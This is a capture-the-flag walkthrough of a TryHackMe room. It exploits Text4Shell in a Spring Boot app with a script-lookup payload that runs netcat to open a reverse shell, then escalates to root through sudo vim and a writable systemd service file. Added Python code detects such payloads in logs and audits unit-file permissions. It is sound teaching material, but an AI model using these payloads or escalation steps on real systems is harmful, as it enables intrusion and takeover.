TryHackMe : Text4shell Writeup

Vicky Aryan
Published in InfoSec Write-ups
6 min read · Sep 3, 2024

Hello Hackers! Dive Deep into the TXT4Shell TryHackMe Room: An Exclusive Walkthrough of My Custom CTF Challenge

In this blog, I’m excited to take you through a detailed walkthrough of my latest creation on TryHackMe: the TXT4Shell room. This room is designed to challenge your skills in cybersecurity, testing your knowledge of various vulnerabilities and exploitation techniques. Whether you’re a seasoned CTF player or a curious beginner, this walkthrough will guide you through the entire process, from initial enumeration to the final exploitation.

We’ll explore the unique aspects of the TXT4Shell challenge, including the inspiration behind its design, the specific vulnerabilities it targets, and the thought process involved in crafting the scenarios. I’ll provide step-by-step instructions, insightful tips, and screenshots to ensure you understand every detail.

By the end of this walkthrough, you’ll not only have pwned the TXT4Shell room but also gained valuable insights that will help you tackle similar challenges in the future. So, let’s dive in and start hacking!

Room Link

https://tryhackme.com/jr/text4shell

Note

After starting the machine, please wait about 5 minutes for all the services to start properly.

Reconnaissance

TCP Scan

First things first, we run a quick initial nmap scan to see which ports are open and which services are running on them.

nmap -sC -sV -O -oA nmap/initial $IP
  • -sC: run default nmap scripts
  • -sV: detect service version
  • -O: detect OS
  • -oA: output all formats and store in file nmap/initial
  • $IP: put here the machine IP address

We get back the following result showing that these ports are open:

  • Port 21: running File Transfer Protocol (FTP) version 3.0.5. This allows anonymous login so we should keep that in mind.
  • Port 22: running OpenSSH version 8.2p1.
  • Port 80: running the default Apache2 landing page.

Before we start investigating these ports, let’s run more comprehensive nmap scans in the background to make sure we cover all bases.

Let’s run an nmap scan that covers all ports.

nmap -sC -sV -O -p- -oA nmap/full $IP
  • -p-: scan all ports, not just the default top 1000

Result

  • Port 8080: an http-proxy service is running; it is also mentioned in the hint tab (interesting)

UDP Scan

nmap -sU -O -oA nmap/udp $IP

Nothing found …

Enumeration

Let’s enumerate more to determine if any of these services are either misconfigured or running vulnerable versions.

Port 21 vsftpd v3.0.5

Anonymous login is allowed with the username anonymous.

Here I tested file upload with the PUT command, but it doesn't work. One file named msg.txt is present; get it with the GET command. There is nothing special in that message, so I think it is a rabbit hole.

Port 22 OpenSSH v8.2p1 Ubuntu 4ubuntu0.11

Not vulnerable to RCE.

Port 80 Apache httpd v2.4.41

Here we found a file named robots.txt.

content of robots.txt

User-agent:*
Disallow: /cgi-bin/
Disallow: /dev/

Inside the /cgi-bin/ folder we found nothing.

Inside /dev we found a file named secret.txt.

content of secret.txt

From Testing Department
Hello developers netcat can't execute commands on server you can use traditional netcat commands

Here I'm not sure exactly what he means; I think it says that netcat-traditional, rather than plain netcat, should be installed on the server by the testing team.

Directories Enumeration

Let’s do more enumeration on the web server. Run gobuster to enumerate directories.

gobuster dir -t 10 -w /usr/share/wordlists/dirb/common.txt -u 10.10.74.48
  • -t: number of threads
  • -w: wordlist
  • -u: specify the URL
  • dir: uses directory/file brute forcing mode

The directories /dev /cgi-bin lead us nowhere.

Enumerate with Dirsearch

dirsearch -u 10.10.74.48
  • -u: used to specify target url

Found a file named test.php.

It exposes the machine name: pwnbox.

Port 8080

Here a Java Spring Boot web page is hosted, and it asks for input in the name field as shown below.

Hello HACK3R5
Send your name to /fun?name=yourname
and see the fun!

After some hints from the box name and extra research, I found that it is vulnerable to Text4Shell.

Gaining a foothold

Since we found that it may be vulnerable to RCE, let's exploit it.

If we pass anything in the name field it is reflected as-is, and if we leave it blank it shows the default name, that is

It may be vulnerable to various kinds of bugs like XSS, but in this writeup I will cover only Text4Shell exploitation.

Prepare your host machine to listen for incoming requests from the target machine.

Type below command in your host machine

nc -lvnp 4444

The command nc -lvnp 4444 is used with Netcat (nc), a versatile networking utility. Here’s a breakdown of what each option does:

  • -l: Listen mode. This tells Netcat to listen for incoming connections.
  • -v: Verbose mode. This option provides more detailed output.
  • -n: Numeric-only IP addresses, no DNS resolution. It prevents Netcat from attempting to resolve hostnames, working directly with IP addresses.
  • -p 4444: Specifies the port number (4444 in this case) to listen on.

In summary: the command nc -lvnp 4444 will make Netcat listen on port 4444 for incoming connections, providing verbose output and avoiding DNS resolution. This is often used in reverse shells or for setting up a simple server to receive connections.

Find your host machine IP

ifconfig

Your IP is found in tun0 interface which is 10.9.0.70

Prepare your payload

payload:

${script:javascript:java.lang.Runtime.getRuntime().exec('nc.traditional -v $target_IP $target_PORT -e /bin/bash')}
  • $target_IP = 10.9.0.70 (in my case; your IP may be different)
  • $target_PORT = 4444

Note: URL-encode your payload with a URL encoder or Burp Suite.

Now pass it in the name field and wait for the response.

WOW, I got my foothold!
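As an added, defender-side example that is not part of the original write-up: a small Python scanner that flags Text4Shell-style interpolation payloads in web-server access logs. It looks for the `${script:…}` lookup used in the payload above, and also for the `${url:…}` and `${dns:…}` lookups that the same Apache Commons Text interpolator exposes, after undoing single and double URL-encoding (the encoding step the note above recommends is what makes the raw string invisible to a naive grep). The log lines are constructed for illustration; the `example.invalid` host and the `System.getProperty` call are placeholders, not values from the room.

```python
"""Added example (not from the original write-up): scan Apache-style access
log lines for Commons Text interpolation lookups (Text4Shell), including
single- and double-URL-encoded forms. Sample lines below are constructed."""
import re
from urllib.parse import unquote

# Lookups reachable through StringSubstitutor interpolation in affected
# Commons Text versions: script: runs code, url: fetches remote content,
# dns: triggers resolver traffic. The interpolator lower-cases the prefix,
# so the match is case-insensitive.
_PATTERN = re.compile(r"\$\{\s*(script|url|dns)\s*:", re.IGNORECASE)


def normalize(raw: str, rounds: int = 3) -> str:
    """Repeatedly URL-decode so %24%7B (single) or %2524%257B (double)
    encoded payloads collapse back to ${...}. Stops when decoding is stable."""
    text = raw
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def find_lookups(raw: str) -> list[str]:
    """Return the dangerous lookup names found in one string after decoding."""
    return [m.group(1).lower() for m in _PATTERN.finditer(normalize(raw))]


# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = [
    '10.9.0.70 - - [03/Sep/2024:10:00:01 +0000] "GET /fun?name=alice HTTP/1.1" 200 42 "-" "curl/7.88"',
    # single URL-encoded ${script:javascript:java.lang.System.getProperty('user.name')}
    '10.9.0.70 - - [03/Sep/2024:10:00:05 +0000] "GET /fun?name=%24%7Bscript%3Ajavascript%3Ajava.lang.System.getProperty%28%27user.name%27%29%7D HTTP/1.1" 200 42 "-" "curl/7.88"',
    # double URL-encoded ${url:UTF-8:http://example.invalid}
    '10.9.0.70 - - [03/Sep/2024:10:00:09 +0000] "GET /fun?name=%2524%257Burl%253AUTF-8%253Ahttp%253A%252F%252Fexample.invalid%257D HTTP/1.1" 200 42 "-" "Mozilla/5.0"',
    # unencoded dns lookup
    '10.9.0.70 - - [03/Sep/2024:10:00:12 +0000] "GET /fun?name=${dns:address|example.invalid} HTTP/1.1" 200 42 "-" "-"',
]


def scan_log(lines) -> list[dict]:
    """Flag every line that carries at least one dangerous lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        lookups = find_lookups(line)
        if lookups:
            # First field of the combined format is the client address.
            hits.append({"line": number, "lookups": lookups, "source": line.split(" ", 1)[0]})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['source']} used {', '.join(hit['lookups'])} lookup")
```

Running it against the sample prints three hits (lines 2, 3 and 4) and nothing for the harmless first request. Decoding in a bounded loop rather than once is the part that matters in practice: a single `unquote` would miss the double-encoded request entirely.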

To upgrade the limited shell to a bash shell, run the following commands.

python3 -c "import pty;pty.spawn('/bin/bash')"
whoami
id
uname -a
  • whoami: print the effective user ID
  • id: print real and effective user and group IDs
  • uname -a: print system information

We found user flag.

We discovered the user.txt file after investigating the computer; don’t forget to decrypt it. It’s the pwnboy user’s password.

Privilege Escalation

Next, I need to figure out what other privileges I have or can easily get. The following command lists the allowed commands for my user.

sudo -l

After running the LinPEAS script on the target machine, we found two ways to escalate privileges.

Method 1 : Abuse Sudo access

We can run vim with sudo access.

Type below command

sudo vim

Then,

You can refer to https://gtfobins.github.io/gtfobins/vim/#sudo to exploit it.

We found the root flag.

Method 2: Abuse Service File

We found that the service file is configured with incorrect permissions, so it is writable by the user pwnboy, and it is responsible for the Java Spring Boot service running on port 8080.

Let's tamper with the myscript.service file and change the user line to user=root.

Restart the service and exploit it the same way as in the initial foothold.

We found the root flag.
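As an added example on the defender's side (not code from the original write-up): a Python audit of systemd unit files for the misconfiguration Method 2 relies on, a unit file that a non-root user can edit. Whatever User= the unit names, the file itself is read and acted on by systemd as root, so an editable unit is a root-equivalent write. The block builds a constructed fixture directory with two units, `myscript.service` (named after the one in the write-up, with a made-up ExecStart and the pwnboy account) set group- and world-writable and `good.service` with the normal 0644 mode, then reports mode bits, ownership and the service account for each; on a real host you would point `audit_directory` at /etc/systemd/system.

```python
"""Added example, not from the original write-up: audit systemd unit files
for the weakness behind Method 2, a unit file that a non-root user can edit.
Any edit to such a file is applied by systemd (as root) on the next restart."""
import os
import re
import stat
import tempfile

_USER_RE = re.compile(r"^\s*User\s*=\s*(\S+)", re.MULTILINE)


def service_user(unit_text: str) -> str:
    """Return the User= value; systemd runs the service as root when it is absent."""
    match = _USER_RE.search(unit_text)
    return match.group(1) if match else "root"


def audit_unit(path: str) -> dict:
    """Check one unit file's ownership and permission bits."""
    st = os.stat(path)
    with open(path, encoding="utf-8") as fh:
        unit_text = fh.read()
    findings = []
    # A unit editable by its own service account (or anyone else) lets that
    # account rewrite User=, ExecStart= and so on; Method 2 is exactly this.
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("group-or-world-writable")
    if st.st_uid != 0:
        findings.append("not-owned-by-root")
    return {
        "name": os.path.basename(path),
        "mode": oct(stat.S_IMODE(st.st_mode)),
        "user": service_user(unit_text),
        "findings": findings,
    }


def audit_directory(directory: str) -> list[dict]:
    """Audit every *.service file in a directory (e.g. /etc/systemd/system)."""
    return [
        audit_unit(os.path.join(directory, name))
        for name in sorted(os.listdir(directory))
        if name.endswith(".service")
    ]


def make_fixture() -> str:
    """Constructed test data: a temp dir with one weak and one sane unit file.
    The ExecStart paths and the pwnboy account are made up for the example."""
    directory = tempfile.mkdtemp(prefix="unit-audit-")
    units = {
        # Mirrors the write-up: runs as pwnboy and is writable by non-root users.
        "myscript.service": (
            "[Unit]\nDescription=constructed Spring Boot app on 8080\n\n"
            "[Service]\nUser=pwnboy\nExecStart=/usr/bin/java -jar /opt/app/app.jar\n\n"
            "[Install]\nWantedBy=multi-user.target\n",
            0o666,
        ),
        # Normal mode: writable by root only; runs as root because User= is absent.
        "good.service": (
            "[Unit]\nDescription=constructed sane unit\n\n"
            "[Service]\nExecStart=/bin/true\n",
            0o644,
        ),
    }
    for name, (text, mode) in units.items():
        path = os.path.join(directory, name)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(text)
        os.chmod(path, mode)
    return directory


if __name__ == "__main__":
    for result in audit_directory(make_fixture()):
        flag = ", ".join(result["findings"]) or "ok"
        print(f"{result['name']}: mode {result['mode']}, User={result['user']}: {flag}")
```

The `not-owned-by-root` finding will also fire on the fixture when the script is run as an unprivileged user, because the temp files belong to that user; against the real /etc/systemd/system directory it is a genuine finding, since a unit owned by anyone else is editable by them regardless of the mode bits.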

Thank you for following along with this walkthrough of the TXT4Shell TryHackMe room!

If you enjoyed this post, found it helpful, or have any feedback, I’d love to hear from you! Don’t forget to:

  • Like this article to show your support.
  • Share it with fellow hackers and friends who might find it useful.
  • Follow me on Medium and LinkedIn to stay updated on more CTF write-ups, cybersecurity tips, and exclusive content.

Happy hacking, and see you in the next challenge!
